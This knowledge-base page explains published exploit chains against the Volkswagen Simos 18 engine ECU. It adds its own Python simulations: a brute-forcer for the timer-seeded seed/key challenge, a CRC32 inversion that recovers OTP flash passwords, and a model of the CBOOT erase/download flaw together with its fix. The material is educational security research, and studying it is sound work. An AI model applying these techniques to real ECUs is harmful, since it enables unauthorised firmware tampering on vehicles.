---
title: Engine Control Units
description: Public reverse-engineering work on engine ECUs, focusing on bri3d's documented exploit chains for the Volkswagen Group Simos 18 ECU and its Infineon TriCore TC1791 processor.
part: Existing Research
---

# Engine Control Units

Engine ECUs are the target of an active reverse-engineering community, driven by the aftermarket tuning scene and by interest in the trust chains that protect factory firmware. The Simos 18, built around the Infineon TriCore TC1791, is the most thoroughly documented case in public research.

## Simos 18

### Simos 18 SBOOT

*Bri3d (Brian Ledbetter), GitHub 2020+* [bri3d-sboot]

The Simos 18 ECU runs on the Infineon TC1791S. Its flash is internal to the processor and protected by passwords burned into a one-time-programmable (OTP) region during manufacturing, so reading the flash out requires an exploit rather than direct hardware access.

The supplier bootloader (SBOOT) occupies the lowest 0x14000 bytes of program flash, checks the CBOOT validity flags during startup, and promotes a verified CBOOT update when one is present.
It also exposes a recovery shell, entered by applying two phase-shifted 3.2 kHz PWM signals to two harness pins at boot; the TriCore GPTA peripheral measures the phase offset and, if it is correct, opens a command shell over ISO-TP on CAN.

The shell requires a seed/key exchange. The ECU generates 256 bytes with a Mersenne Twister PRNG, encrypts them with an RSA public key, and sends the ciphertext; the intended flow requires the tester to decrypt it with the matching RSA private key. In practice the PRNG is seeded only from the system timer, so the seed space is at most 2^31. With tight timing of the CAN exchange, the tester can predict the timer value to within a small window and brute-force that window in seconds on a laptop.

Once past that gate, the pre-signature CRC validator accepts a weakly bounded address header: the start-address bounds check is missing, so the checksum window can be placed over the OTP region. Because each CRC32 update step can be inverted, the four unknown bytes under a window whose remaining contents are known can be back-calculated from the reported checksum; sliding the window across the password area, with a CPU reset between steps, recovers the flash-access passwords.

![Two 3.2 kHz PWM signals with a quarter-period phase offset, as required to enter the Simos 18 SBOOT recovery shell. Figure from Brian Ledbetter (bri3d), 2020 (Simos18_SBOOT).](/images/knowledge-base/existing-research/engine-control-units/bri3d-simos18-sboot-pwm-1.png)
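The following is an added example, written for this page and not taken from Simos18_SBOOT or the ECU firmware, showing why a timer-seeded challenge collapses the seed/key gate described above. Its assumptions, which the research does not state in this form, are: the ECU seeds a stock MT19937 through `init_genrand` with a 32-bit timer value and serialises 64 outputs as 256 little-endian bytes; the RSA encryption is replaced by SHA-256 as a stand-in for "a transform the tester can compute from the public key but not invert", since the attack only needs to compare a candidate against the received ciphertext; the timer value and the estimation window are constructed.

```python
"""Brute-forcing a timer-seeded Mersenne Twister challenge.

Added illustration, not bri3d's code.  Assumed: the ECU seeds a stock MT19937
(init_genrand) with a 32-bit timer value and serialises 64 outputs as 256
little-endian bytes; the RSA encryption is replaced by SHA-256 as a stand-in
for "a transform the tester can compute but not invert"; timer values and the
estimation window are constructed.
"""
import hashlib
import struct


class MT19937:
    """MT19937 seeded the way C firmware typically does it (init_genrand)."""
    N, M = 624, 397

    def __init__(self, seed):
        mt = [seed & 0xFFFFFFFF]
        for i in range(1, self.N):
            prev = mt[-1]
            mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF)
        self.mt, self.index = mt, self.N

    def _twist(self):
        mt = self.mt
        for i in range(self.N):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % self.N] & 0x7FFFFFFF)
            v = mt[(i + self.M) % self.N] ^ (y >> 1)
            mt[i] = v ^ 0x9908B0DF if y & 1 else v
        self.index = 0

    def next_u32(self):
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


def seed_bytes(timer_value):
    """256-byte challenge the ECU derives from its timer (assumed layout)."""
    rng = MT19937(timer_value)
    return b"".join(struct.pack("<I", rng.next_u32()) for _ in range(64))


def public_transform(seed):
    """Stand-in for RSA public-key encryption: computable by anyone holding the
    public key, not invertible without the private key."""
    return hashlib.sha256(seed).digest()


def ecu_challenge(timer_value):
    """ECU side of the exchange: what goes out on the CAN bus."""
    return public_transform(seed_bytes(timer_value))


def brute_force_seed(ciphertext, timer_estimate, window):
    """Tester side: without a timing estimate the search space is the whole
    timer range; with one it is a window of a few hundred values around the
    estimate, searched nearest-first.  Returns (timer, seed) or (None, None)."""
    for delta in range(window + 1):
        for t in sorted({timer_estimate - delta, timer_estimate + delta}):
            t &= 0xFFFFFFFF
            candidate = seed_bytes(t)
            if public_transform(candidate) == ciphertext:
                return t, candidate
    return None, None
```

Once `brute_force_seed` returns the plaintext, the tester holds exactly what decrypting with the RSA private key would have yielded and can derive the key response from it; the seed-to-key derivation itself is out of scope here. Every candidate costs a full 624-word state initialisation plus one twist, which is why the window estimate, not the PRNG, decides whether the search takes seconds or days.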
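An added example of the CRC32 back-calculation, written for this page and not taken from Simos18_SBOOT: a simulated validator whose checksum window may begin anywhere in the image, and a CRC32 inversion that recovers four unknown bytes from one checksum as long as the remaining bytes under the window are known. It goes slightly beyond the text by handling known bytes on either side of the unknown word. The CRC parameters (standard reflected CRC-32 as in zlib), the validator interface `validator_checksum(start)`, and the flash contents are assumptions made for the illustration.

```python
"""Recovering protected bytes through a CRC32 oracle.

Added illustration, not code from Simos18_SBOOT.  Assumed: standard reflected
CRC-32 (poly 0xEDB88320, init and final XOR 0xFFFFFFFF, i.e. zlib.crc32); a
validator that checksums from a tester-chosen start address to the end of the
image and only checks that start lies inside the image; constructed contents.
"""
import zlib

POLY = 0xEDB88320
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)

# The top byte of every table entry is distinct, so one register update can be
# undone: the top byte of the new state identifies the table index that was used.
TOP_TO_INDEX = {t >> 24: i for i, t in enumerate(TABLE)}
if len(TOP_TO_INDEX) != 256:
    raise RuntimeError("table top bytes not unique; inversion would be ambiguous")


def crc_state(data, state=0xFFFFFFFF):
    """CRC-32 register after feeding `data`, without the final XOR."""
    for b in data:
        state = TABLE[(state ^ b) & 0xFF] ^ (state >> 8)
    return state


def crc32(data):
    return crc_state(data) ^ 0xFFFFFFFF


if crc32(b"123456789") != zlib.crc32(b"123456789"):
    raise RuntimeError("CRC parameters do not match zlib")


def unroll_known(state_after, known):
    """Run the register backwards over bytes whose values are known."""
    state = state_after
    for b in reversed(known):
        idx = TOP_TO_INDEX[state >> 24]
        state = ((state ^ TABLE[idx]) << 8) | (idx ^ b)
    return state


def recover_word(known_prefix, known_suffix, crc_value):
    """Return the 4 unknown bytes X given crc32(known_prefix + X + known_suffix)."""
    after_x = unroll_known(crc_value ^ 0xFFFFFFFF, known_suffix)
    # Backward pass: each step yields the table index consumed by one unknown byte
    # and the top 24 bits of the register before it; the low bytes stay unknown.
    indices, state = [], after_x
    for _ in range(4):
        idx = TOP_TO_INDEX[state >> 24]
        indices.append(idx)
        state = (state ^ TABLE[idx]) << 8
    indices.reverse()
    # Forward pass from the fully known prefix state supplies those low bytes,
    # and index XOR low byte is the input byte itself.
    state = crc_state(known_prefix)
    word = bytearray()
    for idx in indices:
        word.append(idx ^ (state & 0xFF))
        state = TABLE[idx] ^ (state >> 8)
    if crc_state(known_suffix, state) ^ 0xFFFFFFFF != crc_value:
        raise ValueError("inversion did not reproduce the observed checksum")
    return bytes(word)


# Constructed image: application bytes followed by a 16-byte password region
# that the tester cannot read directly.  Not real Simos 18 contents.
APP_CODE = bytes(range(0x40, 0x80))
OTP_PASSWORDS = bytes.fromhex("deadbeef0badf00dcafebabe13371337")
FLASH = APP_CODE + OTP_PASSWORDS
OTP_START = len(APP_CODE)


def validator_checksum(start):
    """Simulated pre-signature validator: checksums start..end-of-image and checks
    only that start is inside the image, never that it avoids the OTP region."""
    if not 0 <= start < len(FLASH):
        raise ValueError("start outside image")
    return crc32(FLASH[start:])


def recover_otp(otp_start, otp_len):
    """Walk the password region one word at a time, last word first, so the bytes
    after each window are already known.  (The real chain resets the CPU between
    queries; the reset is not modelled here.)"""
    recovered = b""
    for off in range(otp_len - 4, -1, -4):
        crc = validator_checksum(otp_start + off)
        recovered = recover_word(b"", recovered, crc) + recovered
    return recovered
```

The precondition that matters in practice is the one `recover_word` enforces by construction: a 32-bit checksum only carries 32 bits of information, so exactly four bytes under the window may be unknown per query, and everything else under it must already be known or recovered. `recover_otp` therefore walks from the end of the protected region backwards so that each window's suffix is known; walking forwards with a known prefix works the same way if the validator allows the window to start in known flash.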
### Simos 18 CBOOT and VW_Flash

*Bri3d (Brian Ledbetter), GitHub 2020+* [bri3d-vwflash]

CBOOT is VW's standard firmware update interface, implementing the UDS flashing sequence described in the [ECU Flashing chapter](/knowledge-base/reverse-engineering/ecu-flashing): extended session, SA2 seed/key, erase, block download with Encryption A (AES-128-CBC) and Compression A (LZSS), and RSA signature verification. Each block's OK flag lives immediately after the block in flash, outside the erased range.

The vulnerability is a state-machine oversight: CBOOT requires Erase before Download but never checks that the block being downloaded is the one that was erased. A tester can erase block N and then download into block M. Because the TriCore flash controller writes directly to program flash as chunks arrive, the data lands in M while M's OK flag remains untouched. The subsequent CRC and RSA checks fail, but nothing on that failure path clears an OK flag (only the erase did, and that was N's), so CBOOT still treats M as valid on the next boot, yielding arbitrary code execution in a block the trust chain treats as signed.

Writing into non-erased TriCore flash is constrained: bits can only flip from zero to one, and the ECC bits stored alongside each word carry the same limit. The practical method is therefore to target runs of 0x00 bytes (NOP on TriCore) and write a jump plus a small payload into that space, keeping the ECC consistent.
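An added model of the erase/download state machine and the bit-programming constraint described in the two paragraphs above, written for this page and not bri3d's code or VW's firmware: a small CBOOT stand-in with the missing erased-block check, the same model with the check added, and helpers that locate 0x00 runs and test whether a patch needs only 0-to-1 transitions. Block contents, sizes and the payload bytes are constructed (the payload is not a real TriCore encoding), the erased state of 0x00 follows the text, and ECC is not modelled.

```python
"""Model of the CBOOT erase/download oversight and its hardening.

Added illustration, not bri3d's code or VW firmware.  Block contents are
constructed; the payload bytes are a stand-in, not a real TriCore encoding;
ECC is not modelled, only the rule that programming can set bits but never
clear them (erased flash reads as 0x00, following the text).
"""
import zlib
from dataclasses import dataclass


@dataclass
class Block:
    data: bytearray
    ok_flag: bool = True   # stored just past the block, outside the erased range


class CbootModel:
    def __init__(self, blocks, check_erased_block=False):
        self.blocks = blocks
        self.check_erased_block = check_erased_block  # False: behaviour described on the page
        self.erased = None                            # block number of the last erase

    def request_erase(self, n):
        blk = self.blocks[n]
        blk.data = bytearray(len(blk.data))           # every bit cleared to 0
        blk.ok_flag = False
        self.erased = n

    def transfer_data(self, n, offset, chunk):
        if self.erased is None:
            raise PermissionError("Download before Erase is rejected")
        if self.check_erased_block and n != self.erased:
            raise PermissionError(f"block {n} is not the erased block {self.erased}")
        blk = self.blocks[n]
        for i, b in enumerate(chunk):
            blk.data[offset + i] |= b                 # flash controller: only 0->1 transitions take

    def transfer_exit(self, n, expected_crc, signature_valid):
        blk = self.blocks[n]
        if zlib.crc32(bytes(blk.data)) == expected_crc and signature_valid:
            blk.ok_flag = True
        # A failed check sets nothing; the flag keeps whatever the erase left (or did not touch).
        self.erased = None
        return blk.ok_flag

    def bootable(self):
        return sorted(n for n, b in self.blocks.items() if b.ok_flag)


def can_program(old, new):
    """True if `new` differs from `old` only by 0->1 bit transitions."""
    return len(old) == len(new) and all((o & ~n) == 0 for o, n in zip(old, new))


def find_zero_runs(data, min_len):
    """Offsets of runs of at least min_len 0x00 bytes (NOP on TriCore)."""
    runs, start = [], None
    for i, b in enumerate(bytes(data) + b"\x01"):   # sentinel terminates a trailing run
        if b == 0 and start is None:
            start = i
        elif b != 0 and start is not None:
            if i - start >= min_len:
                runs.append(start)
            start = None
    return runs


def run_scenario(check_erased_block):
    """Erase the calibration block (2), then download a patch into a 0x00 run of
    the application block (1) and report whether block 1 still boots as signed."""
    app = b"\x12\x34\x56\x78" + b"\x00" * 8 + b"\x9a\xbc\xde\xf0"   # constructed
    blocks = {1: Block(bytearray(app)), 2: Block(bytearray(b"\x11\x22\x33\x44" * 4))}
    ecu = CbootModel(blocks, check_erased_block)
    payload = b"\xa5\x5a\xa5\x5a"                      # stand-in for "jump + payload"
    target = find_zero_runs(app, len(payload))[0]
    assert can_program(app[target:target + 4], payload)

    ecu.request_erase(2)                               # erase block N ...
    try:
        ecu.transfer_data(1, target, payload)          # ... download into block M
    except PermissionError:
        pass
    ecu.transfer_exit(1, expected_crc=0, signature_valid=False)  # verification fails either way
    return {
        "patched": bytes(blocks[1].data[target:target + 4]) == payload,
        "bootable": ecu.bootable(),
    }
```

With `check_erased_block=False` the patch lands in block 1 and block 1 still boots, because its OK flag was never cleared and the failed verification clears nothing. With the check added, the download is refused and block 1 is untouched. The two small fixes the model makes visible are the ones a reviewer of such a bootloader would ask for: bind every TransferData to the block of the preceding RequestErase, and clear a block's OK flag on any failed verification rather than only on erase.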

Building on both exploit chains, bri3d released VW_Flash, an open-source Python toolkit that automates the full flashing pipeline for Simos 18 and several other VW Group ECUs, handling SA2 key computation, FRF/ODX parsing, Encryption A, Compression A, and the UDS transfer sequence.

## References

- [bri3d-sboot] Brian Ledbetter (bri3d), *Simos18_SBOOT: Simos 18 Supplier Bootloader documentation and exploit*, 2020. https://github.com/bri3d/Simos18_SBOOT
- [bri3d-vwflash] Brian Ledbetter (bri3d), *VW_Flash documentation: Simos 18 CBOOT analysis and flashing tools*, 2020. https://github.com/bri3d/VW_Flash/blob/master/docs/docs.md